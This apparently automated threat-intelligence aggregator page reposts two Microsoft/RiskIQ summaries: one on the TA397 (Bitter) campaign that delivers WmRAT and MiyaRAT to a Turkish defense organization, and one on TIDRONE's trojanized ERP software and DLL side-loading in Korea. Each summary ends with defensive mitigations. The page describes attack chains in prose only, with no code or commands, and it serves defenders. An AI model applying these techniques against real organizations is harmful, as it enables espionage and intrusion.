One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8627194 |
| Date de publication | 2024-12-18 18:56:30 (vue: 2024-12-18 19:08:38) |
| Titre | Hidden in Plain Sight: TA397\'s New Attack Chain Delivers Espionage RATs (Recyclage) |
| Texte | #### Targeted Geolocations - Türkiye #### Targeted Industries - Defense Industrial Base ## Snapshot Proofpoint recently observed TA397, an advanced persistent threat (APT) group also known as Bitter, targeting a Turkish defense organization using spearphishing emails. The campaign leveraged lures related to public infrastructure projects in Madagascar, containing RAR archives with NTFS alternate data streams (ADS). These ADS streams delivered a malicious shortcut (LNK) file, which executed PowerShell commands to create a scheduled task for downloading additional payloads. ## Description In this attack, TA397 deployed two remote access trojans (RATs): WmRAT and MiyaRAT, both designed for intelligence gathering and data exfiltration. WmRAT is a C++-based backdoor capable of executing commands, capturing screenshots, determing geolocation data, and stealing system information. MiyaRAT, also written in C++, offers similar functionality. According to Proofpoint, this attack aligns with TA397\'s established tactics, which include using RAR archives and scheduled tasks for persistence, targeting defense sector organizations in the EMEA and APAC regions, and leveraging RATs historically attributed to the group. Notably, MiyaRAT appears to be reserved for high-value targets, as evidenced by its limited use. Proofpoint assesses that TA397\'s activities are likely intelligence-gathering efforts in support of a South Asian government. The group\'s consistent focus on the defense, energy, and engineering sectors in EMEA and APAC regions underscores their ability to adapt tools and techniques to target high-value entities effectively. ## Microsoft Analysis and Additional OSINT Context TA397, also known as [Bitter and T-APT-17](https://attack.mitre.org/groups/G1002/), is a likely South Asian cyber espionage threat group, active since at least 2013. The[group\'s targets](https://blog.talosintelligence.com/bitter-apt-adds-bangladesh-to-their/) have included organizations within the energy, engineering, government, and military sectors of China, Bangladesh, Pakistan, and Saudi Arabia, among others. The group is primarily motivated by espionage and has been observed targeting both mobile and desktop platforms. TA397 has used a number of RATs including Bitter RAT, SlideRAT, AndroRAT, and Almond RAT in addition to WmRAT and MiyaRAT, mentioned above. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint. - Enable [ne |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2013 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 ability above access accessed according action active activities adapt addition additional adds ads advanced af74 against age alert alerts aligns all allow almond also alternate among analysis androrat antivirus any apac appears apt arabia archives are artifacts asian assesses attack attacker attributed authority automated backdoor bangladesh base based been behind bitter block both breach breaches c++ campaign can capable capturing chain changes china client cloud com/bitter com/en com/microsoft com/threatanalytics3/9382203e com/us/blog/threat commands common components configure consistent containing content context controlled copyright cover create credential criterion customers cyber data defend defender defense delivered delivers deployed description designed desktop detect detected detections/hunting detects determing distribution does downloading edr effectively efforts email emails emea enable enabled encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent energy engineering ensure entities equivalent espionage established even evidenced evolving executable executed executing exfiltration file files focus folder folders follow following from full functionality gathering geolocation geolocations government group hardening has have hidden high historically https://attack https://blog https://learn https://security https://www immediate impact include included including industrial industries information infrastructure insight/hidden intelligence investigation investigations its known learndoc learning least leveraged leveraging like likely limited list lnk local lsa lsass lures machine madagascar majority malicious malware: manage meet mentioned microsoft military mitigations mitre miyarat mobile mode motivated name=worm:win32/znyonm network new non not notably ntfs number observed ocid=magicti offers org/groups/g1002/ organization organizations osint others overview pakistan part passive payloads permission persistence persistent plain platforms post powershell preferences premises prevalence prevent primarily product prohibited projects proofpoint protection protection#how protections public queries ransomware rapidly rar rat rats recently recommendations recommends reduce reducing reduction reference#block references regions related remediate remediation remote reproduction reserved resolve rights rule rules run running saudi scenes scheduled screenshots sector sectors security settings shortcut sight sight: significantly similar since site sliderat snapshot south spearphishing stealing streams subsystem support surface system ta397 ta397s tactics take talosintelligence tamper target targeted targeting targets task tasks techniques theft their/ thereof these threat threats tools trojan:win32/alevaul trojan:win32/znyonm trojans trusted turkish turn two türkiye underscores unknown unless us/defender us/wdsi/threats/malware use used using value view=o365 volume webmail when which windows within without wmrat works worldwide written xdr your |
| Tags | Ransomware Malware Tool Threat Mobile Industrial |
| Stories | |
| Move | 
|
Les reprises de l'article (1):
| Source | RiskIQ |
|---|---|
| Identifiant | 8626791 |
| Date de publication | 2024-12-17 22:39:16 (vue: 2024-12-17 23:08:46) |
| Titre | Analysis on the Case of TIDRONE Threat Actor\\'s Attacks on Korean Companies |
| Texte | #### Targeted Geolocations - Korea ## Snapshot The AhnLab Security Intelligence Center (ASEC) has identified recent attacks by TIDRONE, a Chinese-speaking threat group that has been [previously observed attacking Taiwanese defense and drone manufacturing companies](https://security.microsoft.com/intel-explorer/articles/14a1a551). ## Description In these attacks, ASEC has observed TIDRONE targeting organizations through the exploitation of Enterprise Resource Planning (ERP) software to distribute a backdoor called CLNTEND. The group uses DLL side-loading techniques to install backdoor malware, including CXCLNT and CLNTEND by exploiting ERP software and remote monitoring and management (RMM) tools like UltraVNC. ASEC discovered that since the first half of 2024, Korean companies have been targeted with CLNTEND. The attacks often leverage small-scale, customized ERP solutions that lack official websites and have limited user bases. TIDRONE either replaces legitimate ERP versions with malware or combines ERP software with malicious droppers. Key executable files exploited include winword.exe, VsGraphicsDesktopEngine.exe, and rc.exe, which load the malicious DLL and execute the encrypted backdoor malware. CLNTEND is a Remote Access Trojan (RAT) that supports multiple communication protocols, including TCP, TLS, HTTP, HTTPS, and SMB, making it versatile for covert operations. TIDRONE\'s loaders are highly obfuscated and use techniques like FlsCallback and Fiber structure overwriting to evade analysis. According to ASEC, the continued targeting of Korean companies underscores TIDRONE\'s expanded focus beyond Taiwan. By exploiting ERP vulnerabilities, particularly those developed by small firms, the group maintains a foothold for delivering its malware. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint. - Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint. - Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem) LSA protection. ## Detections/Hu |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 access accessed according action actor af74 against ahnlab alert alerts all allow analysis antivirus any are artifacts asec attacker attacking attacks authority automated backdoor based bases been behind beyond block breach breaches called can case center changes chinese clntend cloud com/en com/en/85119/ com/intel com/microsoft com/threatanalytics3/9382203e combines common communication companies components configure content continued controlled copyright cover covert credential customized cxclnt defend defender defense delivered delivering description detect detected detections/hunting detects developed discovered distribute distribution dll does drone droppers edr either enable enabled encrypted encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent ensure enterprise equivalent erp evade even evolving exe executable execute expanded exploitation exploited exploiting explorer/articles/14a1a551 fiber files firms first flscallback focus folder folders follow following foothold from full geolocations group half hardening has have highly http https https://asec https://learn https://security https://www identified immediate impact include including install intelligence investigation investigations its key korea korean lack learndoc learning legitimate leverage like limited load loaders loading local lsa lsass machine maintains majority making malicious malware malware: manage management manufacturing microsoft mitigations mode monitoring multiple name=trojan:win32/casdet network new non not obfuscated observed ocid=magicti official often operations organizations overview overwriting part particularly passive permission planning post preferences premises previously product prohibited protection protection#how protections protocols queries rapidly rat recent recommendations recommends reduce reducing reduction reference#block references remediate remediation remote replaces reproduction reserved resolve resource rfn rights rmm rules run running scale scenes security settings side significantly since site small smb snapshot software solutions speaking stealing structure subsystem supports surface taiwan taiwanese take tamper targeted targeting tcp techniques theft thereof these those threat threats through tidrone tls tools trojan trojan:win32/casdet turn ultravnc underscores unknown us/defender us/wdsi/threats/malware use user uses versatile versions view=o365 volume vsgraphicsdesktopengine vulnerabilities websites when which windows winword without works worldwide written your |
| Tags | Malware Tool Vulnerability Threat |
| Stories | |
| Move |
|
L'article ne semble pas avoir été repris sur un précédent.